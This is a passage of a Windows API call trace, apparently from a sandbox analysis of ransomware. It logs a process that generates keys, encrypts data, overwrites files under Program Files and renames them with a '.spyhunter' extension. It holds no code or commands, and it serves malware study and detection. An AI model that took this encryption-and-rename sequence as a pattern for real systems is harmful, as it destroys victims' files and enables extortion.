lpSrch=".txt") returned 0x0 [0112.415] GetProcessHeap () returned 0x2c0000 [0112.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0112.415] ReadFile (in: hFile=0x15c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248faac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248faac*=0x1fb, lpOverlapped=0x0) returned 1 [0112.417] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffe05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.417] WriteFile (in: hFile=0x15c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x248faac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248faac*=0x1fb, lpOverlapped=0x0) returned 1 [0112.417] GetProcessHeap () returned 0x2c0000 [0112.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0112.417] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.417] WriteFile (in: hFile=0x15c, lpBuffer=0x248faec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248faac, lpOverlapped=0x0 | out: lpBuffer=0x248faec*, lpNumberOfBytesWritten=0x248faac*=0x4, lpOverlapped=0x0) returned 1 [0112.417] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248faac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248faac*=0x30, lpOverlapped=0x0) returned 1 [0112.417] CloseHandle (hObject=0x15c) returned 1 [0112.417] GetProcessHeap () returned 0x2c0000 [0112.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.417] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.HTM.spyhunter") returned 76 [0112.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\judgesch.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\JUDGESCH.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\judgesch.htm.spyhunter")) returned 1 [0112.590] GetProcessHeap () returned 0x2c0000 [0112.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.591] GetProcessHeap () returned 0x2c0000 [0112.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0112.591] GetProcessHeap () returned 0x2c0000 [0112.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01910 | out: hHeap=0x2c0000) returned 1 [0112.591] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248faf0 | out: pbBuffer=0x248faf0) returned 1 [0112.591] GetProcessHeap () returned 0x2c0000 [0112.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0112.591] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fae8*=0x30) returned 1 [0112.591] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0112.592] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF") returned 66 [0112.592] StrStrW (lpFirst="CURRENCY.GIF", lpSrch=".txt") returned 0x0 [0112.592] GetProcessHeap () returned 0x2c0000 [0112.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.592] ReadFile (in: hFile=0x15c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248faac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248faac*=0x176f, lpOverlapped=0x0) returned 1 [0112.712] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe891, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.712] WriteFile (in: hFile=0x15c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x176f, lpNumberOfBytesWritten=0x248faac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248faac*=0x176f, lpOverlapped=0x0) returned 1 [0112.712] GetProcessHeap () returned 0x2c0000 [0112.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.712] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.713] WriteFile (in: hFile=0x15c, lpBuffer=0x248faec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248faac, lpOverlapped=0x0 | out: lpBuffer=0x248faec*, lpNumberOfBytesWritten=0x248faac*=0x4, lpOverlapped=0x0) returned 1 [0112.713] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248faac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248faac*=0x30, lpOverlapped=0x0) returned 1 [0112.713] CloseHandle (hObject=0x15c) returned 1 [0112.713] GetProcessHeap () returned 0x2c0000 [0112.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0112.713] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF.spyhunter") returned 76 [0112.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\CURRENCY.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\currency.gif.spyhunter")) returned 1 [0112.713] GetProcessHeap () returned 0x2c0000 [0112.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0112.713] GetProcessHeap () returned 0x2c0000 [0112.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0112.714] GetProcessHeap () returned 0x2c0000 [0112.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01500 | out: hHeap=0x2c0000) returned 1 [0112.714] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fae8 | out: pbBuffer=0x248fae8) returned 1 [0112.714] GetProcessHeap () returned 0x2c0000 [0112.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0112.714] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fae0*=0x30) returned 1 [0112.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\issues.accdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0112.714] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt") returned 72 [0112.714] StrStrW (lpFirst="Issues.accdt", lpSrch=".txt") returned 0x0 [0112.714] GetProcessHeap () returned 0x2c0000 [0112.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.714] ReadFile (in: hFile=0x15c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248faa4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248faa4*=0x2800, lpOverlapped=0x0) returned 1 [0112.718] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.719] WriteFile (in: hFile=0x15c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248faa4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248faa4*=0x2800, lpOverlapped=0x0) returned 1 [0112.719] GetProcessHeap () returned 0x2c0000 [0112.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.719] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.719] WriteFile (in: hFile=0x15c, lpBuffer=0x248fae4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248faa4, lpOverlapped=0x0 | out: lpBuffer=0x248fae4*, lpNumberOfBytesWritten=0x248faa4*=0x4, lpOverlapped=0x0) returned 1 [0112.857] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248faa4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248faa4*=0x30, lpOverlapped=0x0) returned 1 [0112.857] CloseHandle (hObject=0x15c) returned 1 [0112.858] GetProcessHeap () returned 0x2c0000 [0112.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0112.858] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt.spyhunter") returned 82 [0112.858] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\issues.accdt"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Issues.accdt.spyhunter" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\issues.accdt.spyhunter")) returned 1 [0112.859] GetProcessHeap () returned 0x2c0000 [0112.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0112.859] GetProcessHeap () returned 0x2c0000 [0112.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0112.859] GetProcessHeap () returned 0x2c0000 [0112.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de0808 | out: hHeap=0x2c0000) returned 1 [0112.860] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fae8 | out: pbBuffer=0x248fae8) returned 1 [0112.860] GetProcessHeap () returned 0x2c0000 [0112.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0112.860] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fae0*=0x30) returned 1 [0112.860] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\growth.exe" (normalized: "c:\\program files\\reference assemblies\\growth.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0112.860] GetProcessHeap () returned 0x2c0000 [0112.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0112.860] GetProcessHeap () returned 0x2c0000 [0112.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32aa10 | out: hHeap=0x2c0000) returned 1 [0112.865] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fad0 | out: pbBuffer=0x248fad0) returned 1 [0112.865] GetProcessHeap () returned 0x2c0000 [0112.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0112.865] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fac8*=0x30) returned 1 [0112.866] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0112.866] GetProcessHeap () returned 0x2c0000 [0112.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0112.866] GetProcessHeap () returned 0x2c0000 [0112.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de97b8 | out: hHeap=0x2c0000) returned 1 [0112.867] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fad0 | out: pbBuffer=0x248fad0) returned 1 [0112.867] GetProcessHeap () returned 0x2c0000 [0112.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0112.867] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fac8*=0x30) returned 1 [0112.867] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0112.867] GetProcessHeap () returned 0x2c0000 [0112.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0112.867] GetProcessHeap () returned 0x2c0000 [0112.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d160 | out: hHeap=0x2c0000) returned 1 [0112.976] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fac8 | out: pbBuffer=0x248fac8) returned 1 [0112.976] GetProcessHeap () returned 0x2c0000 [0112.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0112.977] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fac0*=0x30) returned 1 [0112.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.visualbasic.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0112.978] lstrlenW (lpString="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets") returned 100 [0112.978] StrStrW (lpFirst="Workflow.VisualBasic.Targets", lpSrch=".txt") returned 0x0 [0112.978] GetProcessHeap () returned 0x2c0000 [0112.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0112.978] ReadFile (in: hFile=0x15c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fa84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fa84*=0x143e, lpOverlapped=0x0) returned 1 [0113.097] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffebc2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.097] WriteFile (in: hFile=0x15c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x143e, lpNumberOfBytesWritten=0x248fa84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fa84*=0x143e, lpOverlapped=0x0) returned 1 [0113.097] GetProcessHeap () returned 0x2c0000 [0113.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0113.098] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.098] WriteFile (in: hFile=0x15c, lpBuffer=0x248fac4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fa84, lpOverlapped=0x0 | out: lpBuffer=0x248fac4*, lpNumberOfBytesWritten=0x248fa84*=0x4, lpOverlapped=0x0) returned 1 [0113.098] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fa84, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fa84*=0x30, lpOverlapped=0x0) returned 1 [0113.098] CloseHandle (hObject=0x15c) returned 1 [0113.099] GetProcessHeap () returned 0x2c0000 [0113.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0113.099] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets.spyhunter") returned 110 [0113.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.visualbasic.targets"), lpNewFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets.spyhunter" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.visualbasic.targets.spyhunter")) returned 1 [0113.107] GetProcessHeap () returned 0x2c0000 [0113.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0113.107] GetProcessHeap () returned 0x2c0000 [0113.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.107] GetProcessHeap () returned 0x2c0000 [0113.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de96a0 | out: hHeap=0x2c0000) returned 1 [0113.108] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fac0 | out: pbBuffer=0x248fac0) returned 1 [0113.108] GetProcessHeap () returned 0x2c0000 [0113.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.108] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fab8*=0x30) returned 1 [0113.108] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0113.109] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml") returned 80 [0113.109] StrStrW (lpFirst="WinFXList.xml", lpSrch=".txt") returned 0x0 [0113.109] GetProcessHeap () returned 0x2c0000 [0113.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0113.109] ReadFile (in: hFile=0x15c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fa7c*=0xa12, lpOverlapped=0x0) returned 1 [0113.140] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff5ee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.140] WriteFile (in: hFile=0x15c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa12, lpNumberOfBytesWritten=0x248fa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fa7c*=0xa12, lpOverlapped=0x0) returned 1 [0113.140] GetProcessHeap () returned 0x2c0000 [0113.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0113.140] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.140] WriteFile (in: hFile=0x15c, lpBuffer=0x248fabc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fa7c, lpOverlapped=0x0 | out: lpBuffer=0x248fabc*, lpNumberOfBytesWritten=0x248fa7c*=0x4, lpOverlapped=0x0) returned 1 [0113.140] WriteFile (in: hFile=0x15c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fa7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fa7c*=0x30, lpOverlapped=0x0) returned 1 [0113.140] CloseHandle (hObject=0x15c) returned 1 [0113.140] GetProcessHeap () returned 0x2c0000 [0113.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0113.141] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.spyhunter") returned 90 [0113.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WinFXList.xml.spyhunter" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\winfxlist.xml.spyhunter")) returned 1 [0113.141] GetProcessHeap () returned 0x2c0000 [0113.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0113.141] GetProcessHeap () returned 0x2c0000 [0113.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.142] GetProcessHeap () returned 0x2c0000 [0113.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62a0 | out: hHeap=0x2c0000) returned 1 [0113.143] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fab8 | out: pbBuffer=0x248fab8) returned 1 [0113.143] GetProcessHeap () returned 0x2c0000 [0113.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.143] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fab0*=0x30) returned 1 [0113.143] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpRes.dll" (normalized: "c:\\program files\\windows defender\\msmpres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.143] GetProcessHeap () returned 0x2c0000 [0113.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.143] GetProcessHeap () returned 0x2c0000 [0113.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20700 | out: hHeap=0x2c0000) returned 1 [0113.143] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fab0 | out: pbBuffer=0x248fab0) returned 1 [0113.143] GetProcessHeap () returned 0x2c0000 [0113.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.143] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248faa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248faa8*=0x30) returned 1 [0113.143] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.144] GetProcessHeap () returned 0x2c0000 [0113.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.144] GetProcessHeap () returned 0x2c0000 [0113.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20650 | out: hHeap=0x2c0000) returned 1 [0113.144] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fab0 | out: pbBuffer=0x248fab0) returned 1 [0113.144] GetProcessHeap () returned 0x2c0000 [0113.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.144] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248faa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248faa8*=0x30) returned 1 [0113.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MsMpCom.dll" (normalized: "c:\\program files\\windows defender\\msmpcom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.144] GetProcessHeap () returned 0x2c0000 [0113.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.144] GetProcessHeap () returned 0x2c0000 